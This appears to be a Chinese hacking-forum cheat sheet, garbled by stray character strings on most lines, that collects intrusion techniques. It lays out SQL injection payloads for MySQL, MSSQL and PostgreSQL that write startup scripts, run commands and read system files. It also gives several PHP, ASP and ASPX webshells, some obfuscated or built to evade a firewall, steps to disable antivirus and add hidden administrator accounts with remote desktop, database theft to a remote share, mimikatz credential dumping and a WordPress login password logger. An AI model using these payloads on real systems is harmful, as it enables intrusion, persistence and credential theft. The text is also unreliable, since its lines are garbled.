/ v9 F0 D3 U# Q9 S3 d$ b/ cinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );2 V$ X0 u# I+ d0 u5 X% p( T' G; R$ e! e) P
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );; v0 Q4 U3 L4 A) _+ Q
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";: V2 K# a+ l5 J) g9 d0 K
drop table a;; ] c% y; v& I9 Z) }
2 y7 j( P; D& s# K% ^' k4 P2 D
英文版本:
5 J0 F. t( |8 R# ~) B
% S) q P' \" g, L) ?, y7 Ause test;* t6 _3 E6 {2 S
create table a (cmd text);
; b; D' G) F6 c" c7 L! a& Y; |insert into a values ("set wshshell=createobject (""wscript.shell"") " );8 l* D* _ r, p5 C* q1 O
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* {0 G% t% y, C: s% d
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# E3 U5 P+ `+ nselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
. z d; _0 s" x0 n* P9 Cdrop table a;
. `) ]; V, i H U% h1 Z. |; s* b/ P" V) d# u
create table a (cmd BLOB);. a: B7 \- J2 y$ P9 X: F' |
insert into a values (CONVERT(木马的16进制代码,CHAR));
5 N0 f, o4 Z/ Z! o0 ~& L- Dselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'5 N$ W% P. o6 O& i+ k
drop table a;! |) \" x+ ]1 Y/ o0 A& L
$ W% Y0 m" u$ K x0 f2 E记录一下怎么处理变态诺顿
( j1 ~3 `/ N* `0 `查看诺顿服务的路径1 l7 m3 F: Y# ~% }$ R" ^# h/ a# j
sc qc ccSetMgr
8 n. h2 ^1 f: q% J然后设置权限拒绝访问。做绝一点。。
: q* l( I' G1 r! n X( }, Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system2 }! R+ {5 I4 ^4 h, Y* v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"+ a2 f3 O3 I+ u: |. Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ f5 `6 I6 b* F/ }- A0 r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
5 r. I8 t6 G# S: x2 T% ~
- d7 F" w2 p4 R7 w然后再重启服务器0 [- X O d! U
iisreset /reboot1 E* P/ Q6 ?! E# C5 b X7 z. f
这样就搞定了。。不过完事后。记得恢复权限。。。。% [$ e# b! J( r# A1 e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
" e4 [% M$ w2 y8 f z0 a& T$ jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F3 x4 p# I/ b. }9 n* z8 k1 F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F$ M" o+ K; a2 @2 S4 P2 y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F2 _0 F7 Y# s ?! `% o' O$ P/ Z, G
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin! s5 d- H$ f' k5 m
7 k6 M3 C! g9 c# d& Q2 PEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
# p3 j- h( j- J% U# G0 Z" O( \! i0 e6 M& n5 h0 M i/ Z6 E
postgresql注射的一些东西
9 ^ n8 {/ D8 f" z( ?如何获得webshell
4 `6 }+ h! P: w5 B0 phttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
7 k3 I: [! l4 T! Y; `( z8 Fhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
# C3 s% u/ I {8 shttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;# n" H( ]* H/ b6 T
如何读文件- h! Z+ e* y: S
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);0 m) U2 s8 \6 {5 l# ?7 x
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;: X/ m4 J- t- L' I& m9 c7 W* X
http://127.0.0.1/postgresql.php?id=1;select * from myfile;( Z$ ^7 L" q1 R! R
3 ?% U, W, C0 {/ f: n% Y' J1 |
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
6 M8 ~2 D2 G; M* d+ c当然,这些的postgresql的数据库版本必须大于8.X
+ F7 m4 y) p8 r, [创建一个system的函数:8 Q) F9 N" G' y; E' V! \9 h
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT: a2 {7 D* s3 N* F
9 A8 W$ p, L$ c. m2 s
创建一个输出表:
7 @. t. v' s1 [5 ^: zCREATE TABLE stdout(id serial, system_out text)
' U' H) L/ H6 x2 z6 W3 q2 [
|: S/ z) J# J, G |执行shell,输出到输出表内:8 \7 M3 L- V1 h/ J% C1 ]
SELECT system('uname -a > /tmp/test')
! ?1 g/ O$ M+ k) ^
7 c4 Y2 J4 J+ B) K% ^( m6 i9 S; xcopy 输出的内容到表里面;' o5 z& ~$ @5 L. b2 G0 |- R
COPY stdout(system_out) FROM '/tmp/test'' ]1 R! ~9 A' o2 \
7 ?' L( b% r* c, G* }5 c从输出表内读取执行后的回显,判断是否执行成功
6 \: n5 x4 m+ V! \: b# \ _# D2 C7 S
SELECT system_out FROM stdout
W m7 q1 [) f: \: n, A下面是测试例子) P9 ~& b7 ~7 R2 W3 V
. l( i- \1 [: K
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- $ ]9 W: R0 y: C( U; i- A- b
9 P' T0 _/ f0 e/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'; T# L4 \0 O% U/ ^
STRICT --/ |! X6 ^% `: J' W) j
) g& A v' f0 P# S: _2 r9 P6 B
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
0 b d: o9 @% O l8 I# y8 C
. Z. Y; `, O" K; \+ A/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
5 P4 C! `$ e8 }* L; W6 Y! }. H- j4 L Z* T2 n. o2 ^
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--; x/ I$ C/ I; N6 N9 r6 U9 ~' Z' j6 O
net stop sharedaccess stop the default firewall4 k4 U7 o4 E& o
netsh firewall show show/config default firewall
. N# |% ?7 \4 M: inetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
. D5 d. C6 ^: I. c, ]netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall8 X. I( _" _' t# u# B; K, U
修改3389端口方法(修改后不易被扫出)5 f' T0 l2 u5 J1 S! _
修改服务器端的端口设置,注册表有2个地方需要修改
& N3 I8 S% W. G8 s; |0 P$ _' j3 E
5 j/ B0 [8 d/ G, `[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
, j3 L$ \0 F" I( Q* gPortNumber值,默认是3389,修改成所希望的端口,比如6000% l3 H$ p' u: R* z4 S: H
\& N+ w: u5 C# p! _# u) _, w第二个地方:
8 \; {* X7 M! |5 C% ~- T, {8 o[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 1 g0 u- ~8 ^$ W; O7 _: L4 A
PortNumber值,默认是3389,修改成所希望的端口,比如60000 Z& I+ f" ^. I, U; d
1 Z4 i* L- L' b8 O现在这样就可以了。重启系统就可以了: B+ o* } o# q
8 R5 Q4 h2 K# Z
查看3389远程登录的脚本
8 S2 ^) W0 J, Y5 e( L保存为一个bat文件( l9 U# k7 o3 r p) F
date /t >>D:\sec\TSlog\ts.log5 ]8 h4 e0 o5 b, Q1 U& y
time /t >>D:\sec\TSlog\ts.log& i0 ~- |1 \9 Y' {* } W
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
. A7 n7 P' T/ T% |1 jstart Explorer* ]0 D, U3 P7 k5 A1 w# `% q, m4 R
. M& j$ I# _$ h1 @1 `) Rmstsc的参数:
" @; }. U% h8 k) |6 _0 G* {
8 z8 t# V/ M, x! \; D. c远程桌面连接) P3 Z9 n$ }* ^; Y+ w3 P
$ G4 r/ s9 t9 z l) D# Y
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
% Y Y- n/ `7 U- @ [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
6 C, R# d9 y; O9 A
/ Y: e- c( ]+ q1 Z3 u<Connection File> -- 指定连接的 .rdp 文件的名称。1 `1 ]& h, F& \4 W& I
) r% k5 D" M7 |8 G; t& N
/v:<server[:port]> -- 指定要连接到的终端服务器。
" t( P! K% p, Q$ b. P1 @3 X( G/ `7 C) \$ o6 _3 U
/console -- 连接到服务器的控制台会话。4 K5 ?* j+ T4 W2 D$ A6 F% x8 ], u
3 c; v1 W, N" B( k/f -- 以全屏模式启动客户端。
( ]8 B }' l( l( }0 {2 a4 ]4 _8 K% H& K) O5 P" Z
/w:<width> -- 指定远程桌面屏幕的宽度。$ ]. q3 ~& l9 L6 y. ^* G9 X* Q+ R
; q% [1 V' ?. Y0 w+ _! c8 f# X
/h:<height> -- 指定远程桌面屏幕的高度。
; X' A- t1 m" ~0 k: T% Q# Q8 K, W3 m8 [/ w( F' ~9 z
/edit -- 打开指定的 .rdp 文件来编辑。
6 H, Y% l3 Y7 Z" h8 A0 `0 H" p" G7 K7 ^; L; U) g
/migrate -- 将客户端连接管理器创建的旧版3 k& E: ?% f0 q0 L1 i' }
连接文件迁移到新的 .rdp 连接文件。1 W$ H3 a! G; h" K$ G2 u3 H
- {% w1 p: z) `6 K9 b& q
* C/ m8 [8 V6 \: p' P% z% l0 q其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就! X0 s' B3 v& G0 c
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量4 c1 i: H& T4 k8 X' V7 p" f$ n
, |: X$ w D7 L; ?5 s* M命令行下开启3389) O. R. l, D5 z, {; t3 P+ J' s
net user asp.net aspnet /add
8 }6 p1 g% B! L& {2 x: f$ Z" Gnet localgroup Administrators asp.net /add
1 V" _/ x3 y) [net localgroup "Remote Desktop Users" asp.net /add* I" V& Q/ c" u! Z) h
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D0 Z& j; h. Z5 O+ F N2 G* a
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
4 C4 P& D& `* ~( x0 M1 S+ B2 Q, M; Vecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1: W ?' h1 z, c; y# h6 @( O
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f- E$ n; [4 \1 ]! N
sc config rasman start= auto; i m- \( Y8 O h( ~& K5 V4 F0 ~
sc config remoteaccess start= auto; g% h6 f% p% {' C5 Q+ \. s9 g
net start rasman$ R. U, }7 A6 }: G
net start remoteaccess; S# F+ L# V$ Y0 Z; i0 f8 K9 e& ]0 v
Media
7 K1 k7 B8 R- }! y) H0 v<form id="frmUpload" enctype="multipart/form-data"' x% E& C$ Z/ K
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>% }7 [: `" @, o q, Q9 `% B
<input type="file" name="NewFile" size="50"><br>
5 ^, h0 O, v6 U. B$ W- T7 D: g<input id="btnUpload" type="submit" value="Upload">. R& _7 E @: Q$ J
</form>& d9 B+ }3 B. K, R) t
; Q) a+ V; d) v. y! E# U" Bcontrol userpasswords2 查看用户的密码. t" c) I y8 b, R! |
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径4 w: f* D; H# B: T1 U& K7 s3 l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
& h& D1 E" A5 P! K0 q& |6 ?/ |8 x* Q# x; ^& y7 Y: I$ U* v) h
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:- ~( i& k. g' w; A
测试1:5 `9 P) f7 {; Y3 a0 O' S
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t14 p6 |- i9 w( f" C- b& D+ o
- ^4 s3 `# |$ F) s测试2:7 A! X. q( @# u9 n
& I% X' x9 R4 H
create table dirs(paths varchar(100),paths1 varchar(100), id int)/ v$ P9 w+ C/ L- Y; ~+ r) e; S. s
( s& V( p; ^/ g- X* u
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' m" n6 J# B& H! ^ E: Q% E3 y* w
/ L3 F" _4 D* P+ D+ {SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
, E# x$ k3 L: ?+ V" _3 L2 v _关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
: D( n6 z( Y. t5 h可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;3 ]# }! p# }) u% ?
net stop mcafeeframework5 J2 S9 R( U. x
net stop mcshield; p+ j* [4 z: R g( a. K. f6 c' G# E
net stop mcafeeengineservice
# m$ [0 {! K E8 @! [* ~6 J# pnet stop mctaskmanager
0 n. _" k5 Q7 J4 ?/ Xhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
7 V4 k6 Y4 w* h. ? r- u: m X! U$ n& c
; d# o- a' ^+ r. E+ H' S VNCDump.zip (4.76 KB, 下载次数: 1)
) o: j: ~5 R3 u; G! ~; q, C密码在线破解http://tools88.com/safe/vnc.php' Q8 @5 } B7 c
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取6 |/ s, D7 ~4 N( q$ j, ~
% j0 s2 ~! P( K. H0 J0 R( |exec master..xp_cmdshell 'net user'
% S8 P2 V, v9 r- ?, W( \+ I8 Umssql执行命令。8 X$ |7 y8 i9 w6 N& F$ Z
获取mssql的密码hash查询) p- a4 C4 W; ~$ u/ W) k
select name,password from master.dbo.sysxlogins
$ f8 J3 |% {2 c7 A: s' e5 i+ ^. M3 t: \( q$ {$ @* j# Y
backup log dbName with NO_LOG;$ h: N Y9 r9 B f( ?$ E" {" t9 B
backup log dbName with TRUNCATE_ONLY;5 ]: p9 ^2 [" ]9 h" _
DBCC SHRINKDATABASE(dbName);
$ q& y9 t" }2 `* |* \& Bmssql数据库压缩
1 L0 O, A, V$ d E: P7 k6 Y2 U$ v
8 Z4 O8 H) x( F% A% W$ R6 N0 rRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
' O2 j0 M# _6 g4 U将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。6 j1 |, x1 l' W8 j, P6 o/ \7 x( L
0 v# \3 j* x E$ B" o% z& E0 o
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'- v! P) ]+ ^/ v6 [( n
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
) Z5 h( ^9 X u, f/ N
1 M t$ g6 n5 |4 n" u9 I3 aDiscuz!nt35渗透要点:
9 d1 O! h- r/ K8 l(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default- D2 R/ A, U" V. i- D' l+ B
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>( _0 F$ l8 h0 K C
(3)保存。& s" H2 f/ F8 F# k5 {' g9 Z9 Z' N+ k% B
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
- I' l1 J- }- f- D6 g% cd:\rar.exe a -r d:\1.rar d:\website\: q: w8 b, ^" e, k) G
递归压缩website
7 A$ P: g+ |1 `: F' }2 G: W8 B注意rar.exe的路径
) ^# }! \, ~, K9 L
* p( B8 H9 g5 i( }7 m! q5 [! g<?php
$ ~- `3 p- b) W( K
, R7 L7 O' c& `; ?8 v, H$telok = "0${@eval($_POST[xxoo])}";$ x; S* B6 s# f5 f, ?5 ?
/ A) u, r" J" A: t3 h$ d! d$ N: E
$username = "123456";
) C- w5 i' D% k7 C* ]
6 y3 z: p U/ t# P$userpwd = "123456";
! W( q% ^2 i& O* p3 A3 A& D
5 t6 g+ m/ S# r3 ]3 f$telhao = "123456";
8 P& P) z; f; A2 q* F5 L2 b; @$ \: g( {/ ]7 ?4 N7 y
$telinfo = "123456";
( o7 p; E$ w. ~6 u8 F y4 |- V
4 _+ j6 V( j+ T8 n! o3 t" I?>
% u- v# h7 |- E8 \3 z$ Sphp一句话未过滤插入一句话木马3 i# H4 _. x- K; F
! m0 L/ S! R! @) X2 C3 k. G7 T
站库分离脱裤技巧
# }0 L- s2 ^! i3 p/ T, ^- fexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'0 A1 P+ B! p, f7 z
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'/ ~6 a; W: E. }( s
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。1 \) Y% h2 C9 i, c5 q: j* ]7 M' s
这儿利用的是马儿的专家模式(自己写代码)。
. ~* ?8 W2 z, e g2 A0 mini_set('display_errors', 1);2 _0 j- t' s& |7 v: v. I
set_time_limit(0);* Q, U. |5 x. O2 M; |: p5 Y1 l, k
error_reporting(E_ALL);
3 T6 y% I) t( b7 F# z5 c$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());; T, T5 I2 a' M3 b! d/ l
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());7 p \" G5 Q( h" F0 s
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
! q" y2 u7 D9 Q: |1 [$i = 0;
) B: [+ Y7 g; v9 A1 q$tmp = '';. \$ Q6 F- K% m \8 d$ @
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
: P$ j8 B, u0 n$ C$ X $i = $i+1;3 b' }5 `1 M8 i9 J( ^& `
$tmp .= implode("::", $row)."\n";, `; g( A) g4 H# |2 T
if(!($i%500)){//500条写入一个文件
4 y9 p& ?3 O8 Q5 r# | $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
, z) e' ~# r5 D( A5 u% } file_put_contents($filename,$tmp);1 F6 g0 J" \! x, ?9 M
$tmp = '';0 ^3 d* J) W' w2 H2 V
}
2 W4 u' i/ E. b$ p}
' b' t ~% |$ P$ f' w9 J Kmysql_free_result($result);' c' F) s3 f: e+ W( O; v) i
; g$ F' v5 E/ V/ p6 u& Y$ u1 r# ]; J
- U' y8 S( p, {4 O! T& i1 \! e: z) o' I* q0 k C! c. U
//down完后delete6 K' f, O+ T8 `1 m2 J4 l( M2 A
7 Y+ ?6 p: K) u8 b+ ~6 t9 K* t6 g5 ^! B/ Q: w( d {/ E3 q
ini_set('display_errors', 1);: J) C/ X9 s; _
error_reporting(E_ALL);
2 [6 K% m6 x' p$i = 0;
- ]$ c+ _ C% S4 b1 q, hwhile($i<32) {
# s4 c0 v: G0 ^5 l* m) J $i = $i+1;
) G# m/ O# L) C% W9 C' ` $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
& O# {% _) r; C( x, c3 h unlink($filename);
, J. |, \4 B* T. P: m! \} 3 f, I% E% S; l& e% O
httprint 收集操作系统指纹/ G- R/ |1 a1 c
扫描192.168.1.100的所有端口
2 ]$ U! B* ~$ E' o, N8 gnmap –PN –sT –sV –p0-65535 192.168.1.100
& S4 W. Q% I( i% g, B. O: O+ uhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
- U! Z# ?$ U; ~8 ^' bhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输$ l: j3 }% J& j8 J) l+ X
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
4 P2 W+ S+ l% H7 H
+ l5 D$ r8 X7 U: q3 a9 a' dDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)+ F" s1 V/ t0 S- ^3 C
# i% z1 S: @: M; k; s% v. Q
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
! R/ E, J2 |" Q7 k w) _$ N* ]2 t' p" Z d+ T* l. ^. t! O
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
% {) m, P1 `4 [" w' P- I5 P5 {2 a7 `+ b
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)6 U$ T! @2 ~ d5 z3 _6 I( S8 T
# d$ S6 }9 D* j, j
http://net-square.com/msnpawn/index.shtml (要求安装)
8 p3 p" T6 _' |9 h3 X# i8 T2 _( J* x0 K6 K7 U
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- B8 Z3 N7 l: P' c* h1 S6 p
/ Q* Z4 N. d% F A! j: _3 t SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
+ P4 T H! B0 Q& Aset names gb2312
5 z" v, i9 f7 |3 U3 U2 r导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
- {6 p) M0 k( e: s1 X) q* E
: t. V) o& Q) F9 b1 m! ?* Cmysql 密码修改
% K1 V8 \' ^$ K* l8 I4 KUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
8 k- q. M6 ]( B. i4 B6 l( mupdate user set password=PASSWORD('antian365.com') where user='root';
, l; Q+ n$ O- x. d8 B) E/ E9 d/ bflush privileges;: {5 a( L$ \* B: E5 W8 l( U
高级的PHP一句话木马后门
+ S6 M/ X& O0 M
1 @" U* E/ M; U0 p% g9 i. E5 Y入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
; S! Z2 w/ e) v4 m' p D2 y3 e$ C* f" y4 H/ T) D- t! i E
1、
) ]$ C) U3 C" ]0 f- @
" |% a8 C) J/ s, Q$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
/ u; ~; d. m3 P5 C, M8 J7 e9 w0 R' X/ h- U& Y, `* }% R
$hh("/[discuz]/e",$_POST['h'],"Access");
X8 I; J h! T! p9 ]0 {% E
) I. l7 _% _* j$ V( C//菜刀一句话
5 q" e* a) t0 y! o" w6 d$ g, ?) q# z% U; f
2、 X. X& u, e: p- K$ l# w4 X
6 N- W9 [9 ]8 {7 z' ?. c
$filename=$_GET['xbid'];8 U+ O9 B) e v5 h: {, z
$ O1 ]4 z, m) q- A; ^
include ($filename);
- H. l u- W* `- x( J9 i
3 y: p% M/ x4 |8 n8 n//危险的include函数,直接编译任何文件为php格式运行6 k/ `1 n9 o' I' n' n
2 R( L8 c; ~- }9 t- G+ _& M& J7 H3、
5 i6 ` G; H3 g, x5 l5 J$ z8 u2 A+ L. g! e8 ]) x$ l
$reg="c"."o"."p"."y";, d8 o' R1 n- `8 r$ O6 g
% d3 w" h$ e5 J: d; m$ p
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
4 O( Y) c7 e* n( y1 r! R- }4 B6 o. u+ y
//重命名任何文件
" b1 V4 d$ r" g2 Q2 n- T2 x* Q! m( Z) W' }0 w3 m$ q, G+ k! b4 L
4、. ?3 c: P Q* D. V v! x7 l
( a K1 ?( {7 g4 T @. b) K$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";: P# v* W+ S1 [( Z4 o4 N4 s
e" P$ y5 W! J
$gzid("/[discuz]/e",$_POST['h'],"Access");3 |1 k' x p6 W/ G! J: {
- m2 J. E ?7 `7 I
//菜刀一句话7 J! U1 V3 e( o5 k, s2 f
# h9 G n+ `1 _+ u! m2 j
5、include ($uid);' j/ b! f9 |7 t$ A- ?' `
9 ~2 l4 o4 N6 b9 Z0 t$ \//危险的include函数,直接编译任何文件为php格式运行,POST
8 d. q" [' C" @& X* `" {* V' ^& A, }: c0 ~, T6 O: y
" y! N% Q+ @ ^9 |$ u$ |
//gif插一句话
' {* ]' S; J4 z6 w/ s5 D
& V$ U# y. I# `6、典型一句话6 J. p, `+ ^- }( _1 d0 z1 g
! @7 D& ]3 Y2 G5 {程序后门代码
$ K) a% Z1 @/ X L* o" h! l<?php eval_r($_POST[sb])?>. C; [; u# z. y. i% o" T
程序代码
( F& d6 `% U& H3 {<?php @eval_r($_POST[sb])?>
4 ~) \1 }& l8 D( E& o//容错代码
/ T+ t3 ` w4 ?1 T$ O5 V/ c程序代码) X! W+ K; S% a/ u3 _ |# o
<?php assert($_POST[sb]);?>2 C& C. h* o A/ }: ^, s
//使用lanker一句话客户端的专家模式执行相关的php语句
0 G5 r5 {7 J" J/ ]8 l% h. k程序代码
+ v: J) L& q+ k; u# N0 K( g' f<?$_POST['sa']($_POST['sb']);?>
2 G5 l |$ h7 J0 T' r. l程序代码& u7 M* n; l. x& }
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>: U, \" {& J8 ?+ t- b
程序代码; {3 J8 c3 z2 S: B
<?php
9 v6 w2 y( j0 q. \. n$ r1 \# t@preg_replace("/[email]/e",$_POST['h'],"error");
; e: ?. q, y- C; h8 I0 H+ a?>6 J5 e. A/ ~/ @5 p
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
: x8 T- H$ U8 n8 l5 W程序代码" \' e; f8 l6 S7 x: Z: B3 Q
<O>h=@eval_r($_POST[c]);</O>% F4 ? p2 R) f( w
程序代码
. W! S9 ^& h3 Z" Y0 v0 k* a<script language="php">@eval_r($_POST[sb])</script>
; r& i% A2 j$ ~1 R/ f$ d//绕过<?限制的一句话# n4 H$ T: U2 T
* V/ T2 y5 n* P. t! V7 F0 {& ahttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
. E3 ]+ n. C' O2 W* K! ]4 G详细用法:1 r1 c. _2 _; O
1、到tools目录。psexec \\127.0.0.1 cmd
, W3 Q) j% E( A! F; b- `: W s" S" Z; P- I2、执行mimikatz
3 b' r8 h! o9 h, J3、执行 privilege::debug) ~! m: B4 x, J
4、执行 inject::process lsass.exe sekurlsa.dll
) u& o7 G. w w+ \5、执行@getLogonPasswords
: ?. F2 R, u* V* o' O6、widget就是密码& ^5 {5 A& d# P6 z& z! W
7、exit退出,不要直接关闭否则系统会崩溃。
% {; d r" M0 v' _4 ^5 _, U: [9 k4 v8 F3 ?% P. k8 h
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
( e9 ^ q7 x# j' L* T6 a8 h. l9 e/ o. M* d# ]
自动查找系统高危补丁0 N7 D; \) o4 z8 r, \
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
" T; g, a4 i) [; V: z9 n4 a
# a6 S2 ^% }' G突破安全狗的一句话aspx后门3 k+ Z/ A8 j' A& a; @+ T1 [
<%@ Page Language="C#" ValidateRequest="false" %>
5 w8 V3 T! M2 [" l) f" A$ i<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
9 y) `3 K* Z1 twebshell下记录WordPress登陆密码
; `. f3 w* Z; w* ewebshell下记录Wordpress登陆密码方便进一步社工
( A2 @/ z9 Q$ n1 \- U, J在文件wp-login.php中539行处添加:+ P& Z9 @. E3 M# E0 t: P
// log password
@( o3 Y7 o+ ?8 s: j1 c: ? L$log_user=$_POST['log'];$ \0 b. @ |/ z3 C, G( P
$log_pwd=$_POST['pwd'];+ W9 s, t1 x, Q7 E. G, ?
$log_ip=$_SERVER["REMOTE_ADDR"];
3 r; |: O2 N' e: c: k$ y3 e; |$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
3 `; ^& W9 P" y* O k* |$txt=$txt.”\r\n”;1 u! s4 F* D- Z& n% ?' p
if($log_user&&$log_pwd&&$log_ip){
2 P* X* e9 S" R% r4 X@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
# ], ~7 F/ L! K% |: \( E}/ Y2 S2 d8 g3 X& v/ m5 h
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。0 ]! k3 @8 M5 \+ I) B7 {' `! A
就是搜索case ‘login’
( ^9 f& M- n# c3 S) `) I在它下面直接插入即可,记录的密码生成在pwd.txt中,, A' n, N" b' ^' k% N: ?% T
